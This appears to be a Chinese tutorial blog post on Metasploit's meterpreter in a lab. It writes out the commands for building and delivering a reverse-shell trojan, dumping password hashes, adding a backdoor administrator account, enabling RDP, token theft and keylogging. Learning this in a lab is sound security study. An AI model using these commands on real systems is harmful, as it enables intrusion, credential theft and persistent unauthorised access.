meterpreter的使用
meterpreter是metasploit中的一个杀手锏,通常在漏洞利用成功后,会返回给攻击者一个攻击通道,其中有很多自动化操作
场景布置
生成木马
首先,我们使用metasploit中的另一个后门工具msfvenom
生成一个木马,方便我们测试meterpreter
msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=1234 -f exe -o /root/shell.exe
在/root目录生成了一个shell.exe文件,执行该程序回连地址为172.16.1.103端口为1234的木马
将木马共享到windows电脑
service apache2 start
打开Web服务
cp /root/shell.exe /var/www/html/
,拷贝到Web服务目录
在靶机中执行命令下载木马到C:\
根目录并使用dir
查看
certutil -urlcache -split -f http://172.16.1.103/shell.exe C:\shell.exe
在msfconsole
控制台执行监听
- [use exploit/multi/handler]
[set payload windows/meterpreter/reverse_tcp]
[set LHOST 172.16.1.103]
[set LPORT 1234]
[run] 开始监听即可
靶机执行shell.exe即可反弹meterpreter
meterpreter的使用
meterpreter最出名的就是其接口的方便性,提权,各种命令应有尽有
help查看帮助
会显示所有命令的帮助信息,例如background
后台运行我们的会话
background后台运行我们的会话
如果想要连接我们的会话,使用msfconsole
中学习的sessions
命令可以来连接
sysinfo 查看靶机系统相关信息
exit断开并退出会话
exit
会把会话直接断开
对文件操作的有这些
很容易理解,这些和linux使用的方法是一样的,这里不在一一使用
注意的是:meterpreter中的操作是相对于会话中对我们靶机的操作,而不是攻击机本身
getuid 查看当前会话权限
发下我们获取的管理员的权限,因为是管理员执行的我们的木马。如果是一个低权限用户执行的我们的木马,那么我们的获取的会话也是低权限的用户
getsystem 获取操作系统权限
system:操作系统权限
这个操作大部分情况下是不成功的,因为这个操作是只有我们获取的会话是管理员权限
,才可以提权为system
权限
那么为什么要获取system
权限呢,获取system
权限我们可以直接使用hashdump
把密码hash值导出,使我们对靶机的控制更加方便
hashdump 导出系统中密码的hash值
通过 sam 文件导出系统用户的 hash值,前提是需要获取system
权限,有时候获取了system
权限我们也无法执行
但是,msfconsole
中有导出hash的模块,需要在meterpreter
中run 模块路径
执行
run post/windows/gather/smart_hashdump
获取hash
shell 进入会话靶机终端
这里的权限会跟随meterpreter的权限
若想返回meterpreter控制台,输入exit
退出即可
在进入命令行后,中文可能出现乱码
chcp 65001
将终端编码改为英文即可
run getgui -e 开启远程远程桌面
可以试一试能不能开启,权限越高,越容易开启
这里使用了netstat
查看靶机端口的开放情况,可以看到3389
端口已经被我们开启
开启后,如果我们通过hashdump
破解的管理员或者其他用户的密码,可以使用用户名密码直接连接
当然我们也可以主机创建用户
net user hacker Admin123 /add
和net localgroup administratos hacker /add
创建hacker用户并将hacker用户加入管理员组
若run getgui -e
没有开启3389远程桌面
,我们可以使用cmd命令
打开3389服务
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
使用netstat -an
查看
netstat 查看靶机端口开放状态
ps 查看靶机进程
会显示靶机运行的进程的进程号,父进程号,运行的名称,多少位,运行的用户是,运行的程序的位置
进程号很有用,后面有两个关于进程的提权
steal_token 窃取用户进程令牌
在系统中,一个程序需要用户来运行,运行到内存中就变成了进程,steal_token
可以伪装为指定进程的所运行的用户
例如notepad.exe是Administrator用于运行的
,那么steal_token
只需要指定notepad.exe
的进程号,就可以将我们的权限伪装为Administrator
ps 查看进程
可以看到svchost.exe
的进程为1268
,运行的用户是NT AUTHORRITY/SYSTEM
,拥有system
权限的system用户
steal_token 1268
伪装system
在我们伪装后,权限就变为了system
migrate 内存迁移
这个内存迁移
现在我也不太明白是什么意思,作用和steal_token
一样,只需要找到system
或管理员
的权限,就可以进行提权
ps 查看进程
conhost.exe
的进程为2200
,运行的用户是Administrator
使用内存迁移,获取administrator
,这里我们的权限是system
,可以说一个权限的降级
注意,这里只是为了演示进行的降级,一般情况下,肯定权限越高越好
migrate 2200
通过getuid
获取到现在是Administrator
权限
当使用内存迁移
的时候,建议不要迁移到低权限
的用户,不然权限会变低,而且无法提升权限
迁移到另一个进程将有助于 Meterpreter
与其交互。例如,如果您看到一个文字处理器在目标上运行(例如 word.exe
、notepad.exe
等),您可以迁移到它并开始捕获用户发送到该进程的击键。某些 Meterpreter 版本将为您提供keyscan_start
、 keyscan_stop
和keyscan_dump
命令选项,使 Meterpreter 像键盘记录器一样工作。迁移到另一个进程也可以帮助您拥有更稳定的 Meterpreter 会话。
要迁移到任何进程,您需要键入 migrate
命令,然后键入所需目标进程的 PID
load 加载其他插件
在meterpreter
中也可插入其他插件,例如mimimatz
,不用下载,在meterpreter中有内置
在help
中会有mimikatz
插件的帮助
mimikatz还没有学习,后续学习
meterpreter的使用的更多相关文章
- Meterpreter run vnc 遇到的问题
Metasploit框架中的meterpreter无疑是相当强大的工具,而且具有我目前挺喜欢的vnc.但是我在run vnc时发现得到的远程控制桌面是view-only的,通过-h选项发现没有修改的方 ...
- 渗透攻防工具篇-后渗透阶段的Meterpreter
作者:坏蛋链接:https://zhuanlan.zhihu.com/p/23677530来源:知乎著作权归作者所有.商业转载请联系作者获得授权,非商业转载请注明出处. 前言 熟悉Metasploit ...
- Kali Linux Web 渗透测试— 第二十课-metasploit.meterpreter
Kali Linux Web 渗透测试— 第二十课-metasploit.meterpreter 原文链接:http://www.xuanhun521.com/Blog/7fc11b7a-b6cb-4 ...
- [转]Metasploit的meterpreter黑客脚本列表
原文地址: 摘要: Metasploit的框架是一个令人难以置信的黑客攻击和渗透测试工具,每一个黑客称职的应该是熟悉和有能力的. 在上一篇文章中,我提供了你的 meterpreter 命令列表.这些命 ...
- Meterpreter
监听 AutoRunScrip:自动执行脚本 如:自动执行post/windows/manage/migrate set AutoRunScript post/windows/manage/migra ...
- meterpreter_paranoid_mode.sh允许用户安全上演/无级连接Meterpreter经检查合格证书的处理程序正在连接到
刚刚看完即刻安全大咖的新姿势感觉很6逼,结果成功了meterpreter_paranoid_mode.sh允许用户安全上演/无级连接Meterpreter经检查合格证书的处理程序正在连接到. 我们开始 ...
- meterpreter基础命令大全
meterpreter meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用.为后渗透提供了很多便捷之处 基础命令 我们进入meterpreter之后,键入 ...
- 用meterpreter实现跳板机
meterpreter跳板机 背景:渗透测试者A拿到了B主机的控制权,但没有拿到ssh密码(不能打ssh隧道).现需横向移动渗透内网主机C,为了避免动作过大不便直接在B上对C进行渗透,其中C不能出 ...
- Meterpreter命令详解
0x01初识Meterpreter 1.1.什么是Meterpreter Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以 ...
- Meterpreter提权详解
0x01 Meterpreter自动提权 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马: msfvenom -p windows/meterpr ...
随机推荐
- win10禁用自带键盘
本文转载:https://blog.csdn.net/BiandanLoveyou/article/details/1163550041.不要相信网上说的那种在控制面板更换驱动,禁用什么设备,没卵用, ...
- ESP8266-01S 烧录AT固件
首先就是下载官网的下载软件和AT固件 这是下载好了的 然后就是硬件电路了 我是想把ESP8266用于Ardiuno板子的,然后网上有说买的USBTOTTL的3v3供电不够,所以我就用的Ardiuno板 ...
- R7800 2.4G webshell
webshell执行 iwpriv ath1 disablecoext 1
- 【shell脚本实战】脚本#35 分析每个用户使用的磁盘空间大小
#!/bin/bash #设置 一个变量代表临界值,看看是否能超过这个值,单位是MB MAXDISKUSAGE=20000 #cut -d: -f1,3 /etc/passwd | awk -F: ' ...
- 我的第一周C语言作业
这个作业属于哪个课程 https://edu.cnblogs.com/campus/zswxy/SE2020-2 这个作业要求在哪里 https://edu.cnblogs.com/campus/zs ...
- idea中的快捷键
- 天龙八部<三联版>二
段誉来到无锡,遇上乔峰,斗气与乔峰比酒,乔峰误以为段誉是慕容复,段誉被乔峰豪气所折服,像乔峰坦言,乔峰不但不怒,反而对段誉很认可,二人结拜 段誉跟随乔峰来到丐帮,包不同和三女因为慕容复而和丐帮发生争执 ...
- mysql设置表名不区分大小写
1.root登录,修改/etc/my.cnf2.在mysqld下加入:lower_case_table_names=13.重新数据库
- 简介Hadoop
Hadoop 简介 Hadoop 是什么 Hadoop 是一个提供分布式存储和计算的开源软件框架,它具有无共享.高可用(HA).弹性可扩展的特点,非常适合处理海量数量. Hadoop 是一个开源软件框 ...
- stm32 微秒定延时问题
problem: 如果想用计时器定时微秒级,不要使能自动重载:代码如下: static uint16_t counter; void Delay_us(uint32_t us){ counter=0x ...